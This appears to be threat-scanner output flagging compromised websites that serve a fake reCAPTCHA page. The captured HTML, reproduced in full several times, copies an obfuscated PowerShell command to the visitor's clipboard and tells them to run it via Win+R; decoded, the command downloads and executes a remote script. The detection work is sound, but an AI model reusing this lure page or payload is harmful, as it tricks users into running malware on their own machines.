#fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n",
"ThreatLevel": "High"
}
https://thesignaturemag.salviatech.com/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://thesignaturemag.salviatech.com/",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"URLs": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"ClipboardCommands": "POWerShEll -W h ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"Verify You Are Human",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
},
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { che",
"} function hideCaptchaCheckbox() { che",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec",
"let checkboxBtn = document.getElementById(\"checkbox\"); let chec",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri",
"let verifywindow = document.getElementById(\"verify-window\"); functi",
"andomNumber(); document.getElementById('verification-id').textContent = veri",
"ect(); document.execCommand(\"copy\"); doc",
"tempTextArea.select(); docum",
"href=\"https://cdnjs.cloudflare.com/ajax/libs/font-",
"</div> <script> let checkb"
],
"HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n",
"ThreatLevel": "High"
}
https://www.bratusferramentas.grupomoltz.com.br/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://www.bratusferramentas.grupomoltz.com.br/",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"URLs": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"ClipboardCommands": "POWerShEll -W h ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"Verify You Are Human",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
},
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { che",
"} function hideCaptchaCheckbox() { che",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec",
"let checkboxBtn = document.getElementById(\"checkbox\"); let chec",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri",
"let verifywindow = document.getElementById(\"verify-window\"); functi",
"andomNumber(); document.getElementById('verification-id').textContent = veri",
"ect(); document.execCommand(\"copy\"); doc",
"tempTextArea.select(); docum",
"href=\"https://cdnjs.cloudflare.com/ajax/libs/font-",
"</div> <script> let checkb"
],
"HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid 